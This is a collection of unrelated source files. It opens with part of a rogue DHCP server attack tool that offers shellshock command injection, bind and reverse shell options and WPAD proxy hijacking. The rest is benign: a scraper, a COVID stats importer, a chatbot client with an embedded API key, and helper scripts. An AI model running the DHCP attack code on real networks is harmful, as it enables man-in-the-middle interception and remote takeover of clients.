parser.add_argument('-c', '--shellshock_command', type=str, help='Set shellshock command in DHCP client')
parser.add_argument('-b', '--bind_shell', action='store_true', help='Use awk bind tcp shell in DHCP client')
parser.add_argument('-p', '--bind_port', type=int, help='Set port for listen bind shell (default=1234)',
default=1234)
parser.add_argument('-N', '--nc_reverse_shell', action='store_true',
help='Use nc reverse tcp shell in DHCP client')
parser.add_argument('-E', '--nce_reverse_shell', action='store_true',
help='Use nc -e reverse tcp shell in DHCP client')
parser.add_argument('-R', '--bash_reverse_shell', action='store_true',
help='Use bash reverse tcp shell in DHCP client')
        parser.add_argument('-e', '--reverse_port', type=int, help='Set port for listen reverse shell (default=443)',
default=443)
parser.add_argument('-n', '--without_network', action='store_true', help='Do not add network configure in payload')
parser.add_argument('-B', '--without_base64', action='store_true', help='Do not use base64 encode in payload')
parser.add_argument('--ip_path', type=str,
help='Set path to "ip" in shellshock payload, default = /bin/', default='/bin/')
parser.add_argument('--iface_name', type=str,
help='Set iface name in shellshock payload, default = eth0', default='eth0')
parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response')
parser.add_argument('--dnsop', action='store_true', help='Do not send DHCP OFFER packets')
parser.add_argument('--exit', action='store_true', help='Exit on success MiTM attack')
parser.add_argument('--apple', action='store_true', help='Add delay before send DHCP ACK')
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
        # region Print banner if argument quiet is not set
if not args.quiet:
base.print_banner()
# endregion
# region Set variables
target_mac_address: Union[None, str] = None
target_ip_address: Union[None, str] = None
first_offer_ip_address: Union[None, str] = None
last_offer_ip_address: Union[None, str] = None
dhcp_discover_packets_source_mac: Union[None, str] = None
free_ip_addresses: List[str] = list()
clients: Dict[str, Union[str, Dict[str, Union[bool, str]]]] = dict()
discover_sender_is_work: bool = False
wpad_url: Union[None, str] = None
# endregion
# region Get your network settings
if args.interface is None:
base.print_warning('Please set a network interface for sniffing ARP and DHCP requests ...')
current_network_interface: str = base.network_interface_selection(args.interface)
your_mac_address: str = base.get_interface_mac_address(current_network_interface)
your_ip_address: str = base.get_interface_ip_address(current_network_interface)
your_network_mask: str = base.get_interface_netmask(current_network_interface)
if args.netmask is None:
network_mask: str = your_network_mask
else:
network_mask: str = args.netmask
# endregion
# region Create raw socket
raw_socket: socket = socket(AF_PACKET, SOCK_RAW)
raw_socket.bind((current_network_interface, 0))
# endregion
# region Get first and last IP address in your network
first_ip_address: str = base.get_first_ip_on_interface(current_network_interface)
last_ip_address: str = base.get_last_ip_on_interface(current_network_interface)
first_offer_ip_address: str = base.get_second_ip_on_interface(current_network_interface)
last_offer_ip_address: str = base.get_penultimate_ip_on_interface(current_network_interface)
# endregion
# region Set target MAC and IP address, if target IP is not set - get first and last offer IP
if args.target_mac is not None:
assert base.mac_address_validation(args.target_mac), \
'Bad target MAC address `-t, --target_mac`: ' + base.error_text(args.target_mac) + \
'; example MAC address: ' + base.info_text('12:34:56:78:90:ab')
target_mac_address = str(args.target_mac).lower()
# region Target IP is set
if args.target_ip is not None:
assert target_mac_address is not None, \
'Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)' + \
', for target IP address: ' + base.info_text(args.target_ip)
assert base.ip_address_in_range(args.target_ip, first_ip_address, last_ip_address), \
'Bad target IP address `-T, --target_ip`: ' + base.error_text(args.target_ip) + \
'; target IP address must be in range: ' + base.info_text(first_ip_address + ' - ' + last_ip_address)
target_ip_address = args.target_ip
# endregion
# region Target IP is not set - get first and last offer IP
else:
# Check first offer IP address
if args.first_offer_ip is not None:
assert base.ip_address_in_range(args.first_offer_ip, first_ip_address, last_ip_address), \
'Bad value `-f, --first_offer_ip`: ' + base.error_text(args.first_offer_ip) + \
'; first IP address in your network: ' + base.info_text(first_ip_address)
first_offer_ip_address = args.first_offer_ip
# Check last offer IP address
if args.last_offer_ip is not None:
assert base.ip_address_in_range(args.last_offer_ip, first_ip_address, last_ip_address), \
'Bad value `-l, --last_offer_ip`: ' + base.error_text(args.last_offer_ip) + \
'; last IP address in your network: ' + base.info_text(last_ip_address)
last_offer_ip_address = args.last_offer_ip
# endregion
# endregion
# region Set DHCP sever MAC and IP address
if args.dhcp_mac is None:
dhcp_server_mac_address: str = your_mac_address
else:
assert base.mac_address_validation(args.dhcp_mac), \
'Bad DHCP server MAC address `--dhcp_mac`: ' + base.error_text(args.dhcp_mac) + \
'; example MAC address: ' + base.info_text('12:34:56:78:90:ab')
dhcp_server_mac_address: str = args.dhcp_mac
if args.dhcp_ip is None:
dhcp_server_ip_address: str = your_ip_address
else:
assert base.ip_address_in_range(args.dhcp_ip, first_ip_address, last_ip_address), \
'Bad DHCP server IP address `--dhcp_ip`: ' + base.error_text(args.dhcp_ip) + \
'; DHCP server IP address must be in range: ' + \
base.info_text(first_ip_address + ' - ' + last_ip_address)
dhcp_server_ip_address: str = args.dhcp_ip
# endregion
# region Set router, dns, tftp, wins IP address
# region Set router IP address
if args.router is None:
router_ip_address: str = your_ip_address
else:
assert base.ip_address_in_range(args.router, first_ip_address, last_ip_address), \
'Bad Router IP address `--router`: ' + base.error_text(args.router) + \
'; Router IP address must be in range: ' + base.info_text(first_ip_address + ' - ' + last_ip_address)
router_ip_address: str = args.router
# endregion
# region Set DNS server IP address
if args.dns is None:
dns_server_ip_address: str = your_ip_address
else:
assert base.ip_address_validation(args.dns), \
'Bad DNS server IP address in `--dns` parameter: ' + base.info_text(args.dns)
dns_server_ip_address: str = args.dns
# endregion
# region Set TFTP server IP address
if args.tftp is None:
tftp_server_ip_address: str = your_ip_address
else:
assert base.ip_address_validation(args.tftp), \
'Bad TFTP server IP address in `--tftp` parameter: ' + base.info_text(args.tftp)
tftp_server_ip_address: str = args.tftp
# endregion
# region Set WINS server IP address
if args.wins is None:
wins_server_ip_address: str = your_ip_address
else:
assert base.ip_address_in_range(args.wins, first_ip_address, last_ip_address), \
'Bad value `--wins`: ' + base.error_text(args.wins) + \
'; WINS server IP address must be in range: ' + \
base.info_text(first_ip_address + ' - ' + last_ip_address)
wins_server_ip_address: str = args.wins
# endregion
# endregion
# region Set proxy
if args.proxy is not None:
# Set variables
wpad_url = 'http://' + your_ip_address + '/wpad.dat'
apache2_sites_available_dir = '/etc/apache2/sites-available/'
apache2_sites_path = '/var/www/html/'
wpad_path = apache2_sites_path + 'wpad/'
# Apache2 sites settings
default_site_file_name = '000-default.conf'
default_site_file = open(apache2_sites_available_dir + default_site_file_name, 'w')
default_site_file.write('<VirtualHost *:80>\n' +
'\tServerAdmin [email protected]\n' +
'\tDocumentRoot ' + wpad_path + '\n' +
'\t<Directory ' + wpad_path + '>\n' +
'\t\tOptions FollowSymLinks\n' +
'\t\tAllowOverride None\n' +
'\t\tOrder allow,deny\n' +
'\t\tAllow from all\n' +
'\t</Directory>\n' +
'</VirtualHost>\n')
default_site_file.close()
# Create dir with wpad.dat script
try:
makedirs(wpad_path)
except OSError:
base.print_info('Path: ', wpad_path, ' already exist')
# Copy wpad.dat script
wpad_script_name = 'wpad.dat'
wpad_script_src = utils_path + wpad_script_name
wpad_script_dst = wpad_path + wpad_script_name
copyfile(src=wpad_script_src, dst=wpad_script_dst)
# Read redirect script
with open(wpad_script_dst, 'r') as redirect_script:
content = redirect_script.read()
# Replace the Proxy URL
content = content.replace('proxy_url', args.proxy)
# Write redirect script
with open(wpad_script_dst, 'w') as redirect_script:
redirect_script.write(content)
# Restart Apache2 server
try:
base.print_info('Restarting apache2 server ...')
sub.Popen(['service apache2 restart >/dev/null 2>&1'], shell=True)
except OSError as e:
base.print_error('Something went wrong while trying to run ', '`service apache2 restart`')
exit(1)
# Check apache2 is running
sleep(2)
apache2_pid = base.get_process_pid('apache2')
if apache2_pid == -1:
base.print_error('Apache2 server is not running!')
exit(1)
else:
base.print_info('Apache2 server is running, PID: ', str(apache2_pid))
# endregion
# region Set Shellshock option code
        if args.shellshock_option_code < 1 or args.shellshock_option_code > 254:
base.print_error('Bad value: ', args.shellshock_option_code,
'in DHCP option code! This value should be in the range from 1 to 254')
exit(1)
# endregion
# region Set search domain
domain: bytes = args.domain.encode('utf-8')
# endregion
# region General output
if not args.quiet:
base.print_info('Network interface: ', current_network_interface)
base.print_info('Your IP address: ', your_ip_address)
base.print_info('Your MAC address: ', your_mac_address)
if target_mac_address is not None:
base.print_info('Target MAC: ', target_mac_address)
# If target IP address is set print target IP, else print first and last offer IP
if target_ip_address is not None:
base.print_info('Target IP: ', target_ip_address)
else:
base.print_info('First offer IP: ', first_offer_ip_address)
base.print_info('Last offer IP: ', last_offer_ip_address)
base.print_info('DHCP server mac address: ', dhcp_server_mac_address)
base.print_info('DHCP server ip address: ', dhcp_server_ip_address)
base.print_info('Router IP address: ', router_ip_address)
base.print_info('DNS server IP address: ', dns_server_ip_address)
base.print_info('TFTP server IP address: ', tftp_server_ip_address)
if args.proxy is not None:
base.print_info('Proxy url: ', args.proxy)
# endregion
# region Add ip addresses in list with free ip addresses from first to last offer IP
if target_ip_address is None:
base.print_info('Create list with free IP addresses in your network ...')
get_free_ip_addresses()
# endregion
# region Send DHCP discover packets in the background thread
if args.send_discover:
base.print_info('Start DHCP discover packets send in the background thread ...')
if args.discover_rand_mac:
dhcp_discover_packets_source_mac = eth.make_random_mac()
base.print_info('DHCP discover packets Ethernet source MAC: ', dhcp_discover_packets_source_mac,
' (random MAC address)')
else:
dhcp_discover_packets_source_mac = your_mac_address
base.print_info('DHCP discover packets Ethernet source MAC: ', dhcp_discover_packets_source_mac,
' (your MAC address)')
base.print_info('Delay between DHCP discover packets: ', str(args.discover_delay))
discover_sender_is_work = True
tm.add_task(discover_sender)
# endregion
# region Sniff network
# region Create RAW socket for sniffing
listen_raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
        base.print_info('Waiting for ARP or DHCP requests ...')
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = listen_raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[0:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
if dhcp_discover_packets_source_mac is not None:
if ethernet_header_dict['source'] == dhcp_discover_packets_source_mac:
break
# endregion
# region ARP packet
# 2054 - Type of ARP packet (0x0806)
if ethernet_header_dict['type'] == arp.packet_type:
# region Parse ARP packet
arp_header = packet[eth.header_length:eth.header_length + arp.packet_length]
arp_packet_dict = arp.parse_packet(arp_header)
# endregion
# region Could not parse ARP packet - break
if arp_packet_dict is None:
break
# endregion
# region ARP filter
if arp_packet_dict['opcode'] != 1:
break
# endregion
# region Call function with full ARP packet
reply({
'Ethernet': ethernet_header_dict,
'ARP': arp_packet_dict
})
# endregion
# endregion
# region IP packet
# 2048 - Type of IP packet (0x0800)
if ethernet_header_dict['type'] == ip.header_type:
# region Parse IP header
ip_header = packet[eth.header_length:]
ip_header_dict = ip.parse_header(ip_header)
# endregion
# region Could not parse IP header - break
if ip_header_dict is None:
break
# endregion
# region UDP
if ip_header_dict['protocol'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + (ip_header_dict['length'] * 4)
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
                            if udp_header_dict is None:
break
# endregion
# region DHCP packet
if udp_header_dict['destination-port'] == 67 and udp_header_dict['source-port'] == 68:
# region Parse DHCP packet
dhcp_packet_offset = udp_header_offset + udp.header_length
dhcp_packet = packet[dhcp_packet_offset:]
dhcp_packet_dict = dhcp.parse_packet(dhcp_packet)
# endregion
# region Could not parse DHCP packet - break
if dhcp_packet_dict is None:
break
# endregion
# region Call function with full DHCP packet
full_dhcp_packet = {
'Ethernet': ethernet_header_dict,
'IP': ip_header_dict,
'UDP': udp_header_dict
}
full_dhcp_packet.update(dhcp_packet_dict)
reply(full_dhcp_packet)
# endregion
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
base.print_info('Exit')
exit(0)
# endregion
# endregion
# endregion
except KeyboardInterrupt:
base.print_info('Exit')
exit(0)
except AssertionError as Error:
base.print_error(Error.args[0])
exit(1)
# endregion
``` |
{
"source": "4eks1s/BOT-Toby",
"score": 3
} |
#### File: 4eks1s/BOT-Toby/upgrader.py
```python
import os
import git
from threading import Thread
from time import sleep
os.environ["BOT_UPGRADE"] = "no"
def threaded_function():
while(True):
if os.getenv("BOT_UPGRADE") == "yes":
repo = git.Repo(os.getcwd())
o = repo.remotes.origin
o.pull()
sleep(1)
def start():
exec(open('bot.py').read())
start()
thread = Thread(target = threaded_function)
thread.start()
start()
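# Note (editor): the first start() call blocks while bot.py runs, so the updater
# thread and the second start() only execute after the bot returns.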
``` |
{
"source": "4elovek37/diseases_risk_analysing",
"score": 2
} |
#### File: analyzer/disease_models/covid_19_model.py
```python
from .disease_model import DiseaseModel
from analyzer.models import Disease, DiseaseSeason
class Covid19Model(DiseaseModel):
def __init__(self):
super(Covid19Model, self).__init__()
self.disease = Disease.objects.get(icd_10_code='U07.1')
self.season = DiseaseSeason.objects.get(disease=self.disease,
start_date='2019-11-17')
def _get_season(self):
return self.season
def _get_carrier_window(self):
return 5
def _get_carrier_multiplier(self):
return 1.25
def _get_sar_estimation(self):
return self.disease.sar_estimation
def _get_disease(self):
return self.disease
```
#### File: management/commands/update_covid_19_stats.py
```python
from django.core.management.base import BaseCommand, CommandError
from analyzer.models import Country, Disease, DiseaseSeason, DiseaseStats
import wget
import os
import json
import gzip
import shutil
from datetime import date
class CountryDailyStats:
def __init__(self, date_iso):
self.date = date.fromisoformat(date_iso)
self.confirmed = 0
self.deaths = 0
self.recovered = None
class CountryStatsFromJson:
    def __init__(self):
self.countries_dict = dict()
class Command(BaseCommand):
help = 'Initiates updating of covid_19 stats in Disease_stats table'
#https://github.com/cipriancraciun/covid19-datasets
def __init__(self):
BaseCommand.__init__(self)
#'https://raw.githubusercontent.com/cipriancraciun/covid19-datasets/master/exports/jhu/v1/values.json'
self.url = 'https://github.com/cipriancraciun/covid19-datasets/raw/master/exports/jhu/v1/daily/values.json.gz'
self.zip_path = './analyzer/management/commands/update_covid_19_stats/dataset.gz'
self.json_path = './analyzer/management/commands/update_covid_19_stats/dataset.json'
def handle(self, *args, **options):
try:
directory = os.path.dirname(self.json_path)
if not os.path.exists(directory):
os.makedirs(directory)
wget.download(self.url, self.zip_path)
with gzip.open(self.zip_path, 'rb') as f_in:
with open(self.json_path, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
stats_from_json = self.process_json(self.json_path)
self.stdout.write(self.update_db(stats_from_json))
except:
self.clear_temp_data()
raise
self.clear_temp_data()
return self.style.SUCCESS('update_covid_19_stats finished OK')
@staticmethod
def process_json(json_file_path):
stats_from_json = CountryStatsFromJson()
with open(json_file_path, "r") as read_file:
data = json.load(read_file)
for ds_row in data:
if ds_row['location']['type'] == 'total-country' and 'absolute' in ds_row['values']:
country_code = ds_row['location']['country_code']
if country_code not in stats_from_json.countries_dict:
stats_from_json.countries_dict[country_code] = list()
daily_stats = CountryDailyStats(ds_row['date']['date'])
daily_stats.confirmed = ds_row['values']['absolute']['confirmed']
if 'deaths' in ds_row['values']['absolute']:
daily_stats.deaths = ds_row['values']['absolute']['deaths']
if 'recovered' in ds_row['values']['absolute']:
daily_stats.recovered = ds_row['values']['absolute']['recovered']
stats_from_json.countries_dict[country_code].append(daily_stats)
return stats_from_json
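    # Editor's note (hedged): judging from the keys read above, a dataset row is
    # expected to look roughly like
    #   {"location": {"type": "total-country", "country_code": "RO"},
    #    "date": {"date": "2020-03-01"},
    #    "values": {"absolute": {"confirmed": 10, "deaths": 1, "recovered": 2}}}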
@staticmethod
def update_db(stats):
inserted = 0
updated = 0
season = DiseaseSeason.objects.get(disease=Disease.objects.get(icd_10_code='U07.1'), start_date='2019-11-17')
countries = Country.objects.all()
for country in countries:
country_stats = stats.countries_dict.get(country.iso_a_2_code)
if country_stats is None:
continue
for daily_stats in country_stats:
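                # update_or_create() looks the row up by the keyword filters,
                # updates it with the 'defaults' dict (or creates it) and
                # returns (obj, created_flag)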
obj, created = DiseaseStats.objects.update_or_create(disease_season=season,
country=country,
stats_date=daily_stats.date,
defaults={'recovered': daily_stats.recovered,
'confirmed': daily_stats.confirmed,
'deaths': daily_stats.deaths})
if created:
inserted += 1
else:
updated += 1
return 'update_covid_19_stats: inserted = %i, updated = %i' % (inserted, updated)
def clear_temp_data(self):
if os.path.exists(self.json_path):
os.remove(self.json_path)
if os.path.exists(self.zip_path):
os.remove(self.zip_path)
```
#### File: diseases_risk_analysing/analyzer/views_misc.py
```python
class CountryActualState:
def __init__(self, country_name, date):
self.country_name = country_name
self.CFR = None
self.confirmed = 0
self.deaths = 0
self.recovered = None
#self.growth_gradient = list()
self.avg_growth = 0
self.date = date
class CountriesWorldTop:
def __init__(self):
self.cfr_top = list()
self.growth_top = list()
self.confirmed_top = list()
class DailyStat:
def __init__(self, date, val):
self.date = date
self.val = val
```
#### File: 4elovek37/diseases_risk_analysing/updates_scheduler.py
```python
from subprocess import call
from apscheduler.schedulers.blocking import BlockingScheduler
sched = BlockingScheduler()
@sched.scheduled_job('cron', hour=6, minute=30)
def scheduled_job():
print('Calling handle_tasks...')
call(['python', './manage.py', 'handle_tasks'])
print('Calling handle_tasks done')
sched.start()
``` |
{
"source": "4enzo/learning_py",
"score": 3
} |
#### File: 4enzo/learning_py/my_decorator.py
```python
import time
import functools
def run_time(func):
"函数运行时长"
@functools.wraps(func)
def inner(*args, **kwargs):
start_time = time.time()
result = func(*args, **kwargs)
end_time = time.time()
print('%s spend: %.4f s'%(func.__name__,end_time-start_time))
return result
return inner
#@property
class Test(object):
def __init__(self):
self.__num = 100
    # @property turns a method into an attribute-style accessor
    # Normally a private attribute is accessed through set/get methods, which is verbose
    # Turning a getter into a property only needs @property; @property also creates the @xxx.setter decorator,
    # which turns a setter method into attribute assignment, so we get controlled attribute access
@property
def num(self):
return self.__num
@num.setter
def num(self,number):
if isinstance(number,int):
self.__num = number
else:
print('The number is not a int')
class Foo(object):
name = 'test'
def __init__(self):
pass
    # Normally, methods defined in a class are instance methods by default
    # Calling an instance method requires an instance, which is passed to the function as self
def normal_func(self):
"实例方法"
print('This is normal_func')
        # An instance method can call a static method via self.method_name()
self.static_func()
    # @staticmethod needs neither the self instance argument nor the cls class argument; it works like a plain function
    # If a method never touches instance attributes and only does utility work (e.g. formatting a timestamp), a static method is recommended
@staticmethod
def static_func():
"静态方法"
print('This is static_func')
    # A @classmethod needs no instance and no self argument, but its first argument must be cls (the class itself);
    # it can access class attributes, call class methods, create instances, etc., avoiding hard-coded class names
    # If you need controlled operations on class attributes (i.e. static variables), a class method is recommended
@classmethod
def class_func(cls):
"类方法"
print('This is class_func')
if __name__ == '__main__':
    # Instance methods need an instance, so call them as ClassName().method_name()
Foo().normal_func()
    # ClassName.method_name()
    # ClassName().method_name() also works, but is not recommended
Foo.static_func()
    # ClassName.method_name()
    # ClassName().method_name() also works, but is not recommended
Foo.class_func()
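    # --- Editor's hedged usage sketch (not part of the original file) ---
    # Small demo of the pieces explained above: the run_time decorator reports
    # elapsed time, and Test.num is accessed through the @property getter/setter.
    @run_time
    def _demo_sleep():
        time.sleep(0.2)
    _demo_sleep()    # prints something like "_demo_sleep spend: 0.2002 s"
    t = Test()
    print(t.num)     # 100, read through the @property getter
    t.num = 42       # goes through the @num.setter and passes the int check
    print(t.num)     # 42
    t.num = 'abc'    # rejected by the setter: "The number is not a int"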
``` |
{
"source": "4enzo/spider",
"score": 3
} |
#### File: 4enzo/spider/lianjia_tj.py
```python
import random
import time
import requests
import bs4
import pymongo
# Scrape Tianjin second-hand housing listings from the Lianjia website
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36"
}
def get_request(url):
request = requests.get(url,headers=headers)
if request.status_code == 200:
return request
else:
print(url + "error:"+request.status_code)
return None
def get_total_page():
    # The site currently seems fixed at 100 pages; pg100+ redirects to the home page, so total_page is simply hard-coded to 100???
# request = get_request(url)
# soup = bs4.BeautifulSoup(request.text,'html.parser')
    # total_page = soup.find_all('dev',class_='page-box house-lst-page-box') # not implemented yet, to be continued...
# print(total_page)
total_page = 100
return total_page
def get_pages_url():
    # Build the URL of every page, e.g. https://tj.lianjia.com/ershoufang/pg2/
pages_url = []
for i in range(1,int(get_total_page())+1):
page_url = 'https://tj.lianjia.com/ershoufang/pg'+str(i)
pages_url.append(page_url)
return pages_url
def get_house_url(url_list):
    # Get the title and URL of every house on the page
    # Only the URL is collected (2019-04-01)
house_url_list = []
for url in url_list:
request = get_request(url)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
# house = []
curr_page_house_count = len(soup.find_all('li',class_="clear LOGCLICKDATA"))
for i in range(0,curr_page_house_count):
house_title = soup.find_all('li',class_="clear LOGCLICKDATA")[i].find('div',class_="title").find('a').string
house_url = soup.find_all('li',class_="clear LOGCLICKDATA")[i].find('div',class_="title").find('a',class_="").get('href')
# house.append('{%s,%s}'%(house_title,house_url))
get_house_info(house_url)
# house_url_list.append(house_url)
# return house_url_list
def get_house_info(url):
house_info = {}
request = get_request(url)
soup = bs4.BeautifulSoup(request.text,'html.parser')
basic = soup.find('div',class_='newwrap baseinform').find_all('li')
    # Collect every field to make later analysis easier
house_info['房屋户型'] = basic[0].text[4:]
house_info['所在楼层'] = basic[1].text[4:]
house_info['建筑面积'] = basic[2].text[4:]
house_info['户型结构'] = basic[3].text[4:]
house_info['套内面积'] = basic[4].text[4:]
house_info['建筑类型'] = basic[5].text[4:]
house_info['房屋朝向'] = basic[6].text[4:]
house_info['建筑结构'] = basic[7].text[4:]
house_info['装修情况'] = basic[8].text[4:]
house_info['梯户比例'] = basic[9].text[4:]
house_info['供暖方式'] = basic[10].text[4:]
house_info['配备电梯'] = basic[11].text[4:]
house_info['产权年限'] = basic[12].text[4:]
house_info['挂牌时间'] = basic[13].find_all('span')[1].text
house_info['交易权属'] = basic[14].find_all('span')[1].text
house_info['上次交易'] = basic[15].find_all('span')[1].text
house_info['房屋用途'] = basic[16].find_all('span')[1].text
house_info['房屋年限'] = basic[17].find_all('span')[1].text
house_info['产权所属'] = basic[18].find_all('span')[1].text
house_info['抵押信息'] = basic[19].find_all('span')[1].text.strip()
house_info['房本备件'] = basic[20].find_all('span')[1].text
with open('./lianjia_tj.txt','a') as f:
f.write(str(house_info)+'\n')
write2db(house_info)
def write2db(info):
    # Write into the MongoDB database
conn = pymongo.MongoClient('192.168.199.170', 27017)
db = conn.spider
my_collection = db.lianjia_tj
my_collection.insert(info)
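    # Note (editor): pymongo's insert() has been deprecated in favour of
    # insert_one(); opening a new MongoClient per record is also costly, so a
    # single shared connection would be cheaper.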
def main():
page_url = get_pages_url()
get_house_url(page_url)
# for url in house_url_list:
# time.sleep(random.randint(1,10))
# get_house_info(url)
if __name__ == '__main__':
main()
``` |
{
"source": "4enzo/tuling_robot",
"score": 3
} |
#### File: 4enzo/tuling_robot/tuling.py
```python
import requests
import json
import logging
logging.basicConfig(level=logging.DEBUG,
filename='./log.txt',
filemode='a',
format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
# Talk to the Turing (Tuling) robot by calling its API directly
def get_answer(info):
api_url = 'http://openapi.tuling123.com/openapi/api/v2'
    # Turing robot API, see https://www.kancloud.cn/turing/web_api/522992
    # The script currently only supports text, i.e. reqType=0
    # The apiKey is obtained by registering a robot on the official site; userId can be any value
data = {
'reqType': 0,
'perception': {'inputText':{'text':info}},
'userInfo': {
'apiKey': '6997c5b25a2549cab428708d61d8514e',
'userId': 'python'
}
}
r = requests.post(api_url, data=json.dumps(data))
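    # Note (editor): data=json.dumps(...) posts the raw JSON string; passing
    # json=data instead would also set the Content-Type header automatically.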
s = json.loads(r.text)
reply_code = s['intent']['code']
if reply_code == 10003:
'''code = 10003 新闻类标识码'''
news = s['results'][1]['values']['news']
news_str = s['results'][0]['values']['text'] + ':\n'
for list in news:
# print(list)
news_str = news_str + list['name'] +'\n来源:' + list['info'] +'\n链接:' + list['detailurl'] + '\n\n'
return news_str
elif reply_code == 10014:
        '''code = 10014: link (URL) result code'''
pic = s['results'][1]['values']['text'] + '\n' + s['results'][0]['values']['url']
return pic
elif reply_code == 10015:
        '''code = 10015: recipe result code'''
cook = s['results'][1]['values']['news']
cook_str = s['results'][0]['values']['text'] + ':\n'
for list in cook:
cook_str = cook_str + list['name'] +'\n' + list['info'] +'\n链接:' + list['detailurl'] + '\n\n'
return cook_str
else:
        '''The results for many other code values can be handled the same way; use this for now?'''
answer = s['results'][0]['values']['text']
        # Log other reply_code values for now and handle them in a later update
logging.debug(u'问题:%s\t----%s\n返回数据:%s'%(info,reply_code,s))
return answer
if __name__ == '__main__':
while True:
que = input("我:")
print('图灵机器人:' + get_answer(que))
``` |
{
"source": "4epel-coder/4epelprojekt",
"score": 3
} |
#### File: 4epelprojekt/plots/plots.py
```python
import numpy as np
import matplotlib.pyplot as plt
def plot_train_val(m_train, m_val, period=25, al_param=False, metric='IoU'):
"""Plot the evolution of the metric evaluated on the training and validation set during the trainining
Args:
m_train: history of the metric evaluated on the train
m_val: history of the metric evaluated on the val
period: number of epochs between 2 valutation of the train
al_param: number of epochs for each learning rate
metric: metric used (e.g. Loss, IoU, Accuracy)
Returns:
plot
"""
plt.title('Evolution of the '+metric+ ' with respect to the number of epochs',fontsize=14)
if al_param:
al_steps = np.array( range( 1, int(len(m_train)*period/al_param )+1 ) ) *al_param
for al_step in al_steps:
plt.axvline(al_step, color='black')
plt.plot(np.array(range(0,len(m_train)))*period, m_train, color='blue', marker='o', ls=':', label=metric+' train')
plt.plot(np.array(range(0,len(m_val)))*period, m_val, color='red', marker='o', ls=':', label=metric+' val')
plt.xlabel('Number of Epochs')
plt.ylabel(metric)
plt.legend(loc = 'upper right')
plt.savefig('evol_'+metric)
plt.show()
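
# Hedged usage sketch (editor's addition): with metric histories evaluated every
# 25 epochs one could call, for example,
#     plot_train_val([0.40, 0.55, 0.60], [0.38, 0.50, 0.52], period=25, metric='IoU')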
``` |
{
"source": "4ESoftware/TempRent",
"score": 3
} |
#### File: TempRent/reporting/rep_utils.py
```python
import pandas as pd
from libraries import Logger
from libraries import LummetryObject
import mysql.connector as mysql
from time import time
import matplotlib.pyplot as plt
import seaborn as sns
import os
from datetime import datetime
class RepEngine(LummetryObject):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.SERVER = self.config_data['SERVER']
self.PORT = self.config_data['PORT']
self.USER = self.config_data['USER']
self.PASS = self.config_data['PASS']
self.DB = self.config_data['DB']
self._rep_base = '_get_report_'
try:
self.connect()
except:
self.P("WARNING! Couldn't connect to the mysql DB!")
return
def connect(self):
self.db = mysql.connect(
host=self.SERVER,
port=int(self.PORT),
user=self.USER,
passwd=<PASSWORD>,
database=self.DB
)
cursor = self.db.cursor()
        ## getting all the tables which are present in the configured database
cursor.execute("SHOW TABLES")
tables = cursor.fetchall()
self.D("Connected to '{}'. Found {} tables".format(self.DB, len(tables)))
return
def _load_data(self, table):
cursor = self.db.cursor()
cursor.execute('SELECT * from '+table)
data = cursor.fetchall()
cols = cursor.column_names
dct_res = {cols[i]:[x[i] for x in data] for i,c in enumerate(cols)}
return pd.DataFrame(dct_res)
def _load_sql(self, sql):
cursor = self.db.cursor()
cursor.execute(sql)
data = cursor.fetchall()
cols = cursor.column_names
dct_res = {cols[i]:[x[i] for x in data] for i,c in enumerate(cols)}
return pd.DataFrame(dct_res)
def load_data(self, table):
self.P("Loading table '{}'".format(table))
t0 = time()
df = self._load_data(table)
t_elapsed = time() - t0
self.P(" Done loading in {:.1f}s".format(t_elapsed))
return df
def _get_report_1(self, name_only=False):
"""
Past activity graph: see audit dataset line graph
Returns
-------
Full qualified path.
"""
if name_only:
return "Past activity graph"
# plt.style.use('ggplot')
sns.set()
last_days = 30
df_audit = self.load_data('audit')
df = df_audit.loc[:,['logTime', 'type','id']]
df['date'] = df.logTime.dt.floor('d')
df.drop(columns=['logTime'], inplace=True)
df_counts = df.groupby(['date','type']).count().unstack().fillna(0).unstack().reset_index().sort_values('date')
df_counts['count'] = df_counts[0]
df_counts = df_counts.loc[:,['date','type','count']]
df_counts['types'] = df_counts['type'].apply(lambda x: 'success' if x==1 else 'failure')
df_type1 = df_counts[df_counts.type == 1]
df_type2 = df_counts[df_counts.type == 2]
dates = df_type1.date.dt.strftime('%Y-%m-%d').tolist()
# vals1 = df_type1[0].values
# vals2 = df_type2[0].values
plt.figure(figsize=(13,8))
x = list(range(0, last_days))[:len(dates)]
# _len = len(x)
# y1 = vals1[-_len:]
# y2 = vals2[-_len:]
# plt.bar(x, y1, label='successes')
# plt.bar(x, y2, label='failures')
# plt.xlabel('Days', fontsize=18)
# plt.ylabel('Count of actions', fontsize=18)
ax = sns.barplot(x='date', hue='types', y='count', data=df_counts)
plt.xticks(x, dates)
plt.title('Last {} days activity history ({:%Y-%m-%d %H:%M})'.format(
last_days, datetime.now()), fontsize=30)
plt.legend(title='Activity type')
for p in ax.patches:
ax.annotate(
"%.2f" % p.get_height(),
(p.get_x() + p.get_width() / 2., p.get_height()),
ha='center', va='center', fontsize=11, color='gray', rotation=90,
xytext=(0, 20),textcoords='offset points'
)
return
def _get_report_2(self, name_only=False):
"""
Pie/Bar report with number of tenders for each tag
Returns
-------
Full qualified path.
"""
if name_only:
return "Tenders per tag"
